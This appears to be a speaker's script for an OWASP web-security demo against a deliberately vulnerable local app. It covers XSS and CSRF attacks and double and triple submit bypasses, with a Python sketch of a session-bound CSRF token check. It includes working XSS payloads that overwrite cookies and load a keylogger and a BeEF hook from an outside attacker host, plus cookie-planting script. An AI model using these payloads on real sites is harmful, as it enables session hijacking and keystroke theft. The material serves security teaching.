OWASP_1-Liner_Demos.txt
BadGuy
Chrome https://local.1-liner.org:8444/vulnerable/
https://local.1-liner.org:8444/admin/ <-- Change name to BadGuy
https://attackr.se:8444 <-- Accept cert
https://lolsite.com:8444 <-- Accept cert
John
FF https://local.1-liner.org:8444/vulnerable/
https://attackr.se:8444 <-- Accept cert
https://lolsite.com:8444 <-- Accept cert
*** XSS fight
Show username "John" in FF and "BadGuy" in Chrome.
BadGuy posts:
I love JavaScript<img src=1 onerror=if(document.cookie.indexOf("BadGuy")===-1){document.cookie="nickNameVulnerable=Moron;domain=.1-liner.org;path='/'";} height=0 width=0 />
John posts:
It's EcmaScript, fool<img src=1 onerror=$.getScript('https://attackr.se:8444/attacks/keylogger.js') height=0 width=0 />
Show the server log and let BadGuy type some stuff in the input field (keylogger)
Make sure you are running BeEF (execute ./beef in the BeEF folder)
BadGuy posts:
Besserwisser<img src=1 onerror=$.getScript('https://attackr.se:8444/attacks/hook.js') height=0 width=0 />
BadGuy opens:
http://attackr.se:3000/ui/panel
Reset 1-liner DB, reload John, and switch to BadGuy
// "oneLiner": $.encoder.encodeForHTML(oneLinerStr), // Proper encoding
Besserwisser<img src=1 onerror=$.getScript('https://attackr.se:8444/attacks/hook.js') height=0 width=0 />
Remove encoding fix and switch to BadGuy
*** CSRF + XSS fight
BadGuy posts:
LOL, check the dancing pig: https://lolsite.com:8444/attacks/csrf/csrf.html
Point out that the link goes to another domain (it will auto-post cross-domain)
John clicks
BadGuy posts:
Über LOL, check out the cat: https://lolsite.com:8444/attacks/csrf/csrf2.html
John clicks
BadGuy opens:
http://attackr.se:3000/ui/panel
*** Multi-step, semi-blind CSRF
Make sure BadGuy is logged in at Amazon (remember me)
John posts:
Hey BadGuy, check this out: https://attackr.se:8444/attacks/csrf/amazon/csrfMultiDriver.html
*** Subdomain XSS for double submit bypass
BadGuy:
https://local.1-liner.org:8444/vulnerable/
June:
https://local.1-liner.org:8444/securish/
Make sure webapp/securish/index.jsp uses double and not triple submit (check triple submit is commented out in two places)
June posts:
Hey, this works!
Kill the cookie named cookieToken.
Press a few returns in the log to get space.
June posts:
Will this work?
Show server log.
Reload https://local.1-liner.org:8444/securish/
June posts:
It works again
June:
https://other.1-liner.org:8444/vulnerable/simpleXSS.jsp
Show June's cookieToken cookie.
Search for:
<script>$.cookie("cookieToken", "bogus", {path: "/", domain: ".1-liner.org"});</script>
Again, show June's cookieToken cookie.
BadGuy posts:
OMG! https://attackr.se:8444/attacks/csrf/csrf3.html
Show CSRFed oneliner
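The subdomain bypass above works because a plain double submit check only compares two values the attacker can both plant: the cookieToken cookie (set for .1-liner.org from other.1-liner.org) and the form field. As an added example, not code from the 1-liner app, this Python sketch puts that check beside one that binds the token to the session with an HMAC, so a planted cookie/form pair no longer validates. The helper names, SERVER_KEY and the session id are assumptions.

```python
import hashlib
import hmac
import secrets


def parse_cookie_header(header):
    """Parse a raw Cookie header into a dict (last duplicate wins, like most servlet containers)."""
    jar = {}
    for part in header.split(";"):
        if "=" in part:
            name, _, value = part.strip().partition("=")
            jar[name.strip()] = value.strip()
    return jar


def double_submit_ok(cookie_header, form_token):
    """Naive double submit, as in webapp/securish/index.jsp: cookie and form field just have to match.
    Anything that can set a cookie for the parent domain (a sibling-subdomain XSS) can satisfy this."""
    cookie_token = parse_cookie_header(cookie_header).get("cookieToken")
    return cookie_token is not None and cookie_token == form_token


# Constructed server-side secret; in a real deployment this lives in server config, never in the page.
SERVER_KEY = secrets.token_bytes(32)


def bind_token(session_id, key=SERVER_KEY):
    """Derive the CSRF token from the server-side session id so the client cannot mint its own."""
    return hmac.new(key, session_id.encode(), hashlib.sha256).hexdigest()


def session_bound_ok(cookie_header, form_token, session_id, key=SERVER_KEY):
    """Hardened check: cookie and form must match AND equal the token derived from this session.
    A cookie planted from another subdomain carries no valid HMAC, so it is rejected."""
    cookie_token = parse_cookie_header(cookie_header).get("cookieToken")
    if cookie_token is None or cookie_token != form_token:
        return False
    return hmac.compare_digest(cookie_token, bind_token(session_id, key))


def demo():
    """Legit submission vs. a planted 'bogus' token, as in the demo above (constructed values)."""
    session_id = "sess-june"  # assumed session identifier
    real = bind_token(session_id)
    legit = f"JSESSIONID={session_id}; cookieToken={real}"
    planted = f"JSESSIONID={session_id}; cookieToken=bogus"
    return {
        "legit_double": double_submit_ok(legit, real),
        "legit_bound": session_bound_ok(legit, real, session_id),
        "planted_double": double_submit_ok(planted, "bogus"),
        "planted_bound": session_bound_ok(planted, "bogus", session_id),
    }
```

The planted pair passes the naive check and fails the session-bound one; pairing this with HttpOnly on the session cookie keeps the XSS from simply reading the session id to recompute the token.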
*** Triple submit and bypass via cookie jar overflow ***
Bring in the triple submit cookie in webapp/securish/index.jsp (bring back the commented-out code in two places)
June:
Reload https://local.1-liner.org:8444/securish/
Show random cookie
June:
https://other.1-liner.org:8444/vulnerable/cookieWipeXSS.jsp
Overflow cookie jar.
BadGuy posts:
Ha, ha! https://attackr.se:8444/attacks/csrf/csrf4.html
Show CSRFed oneliner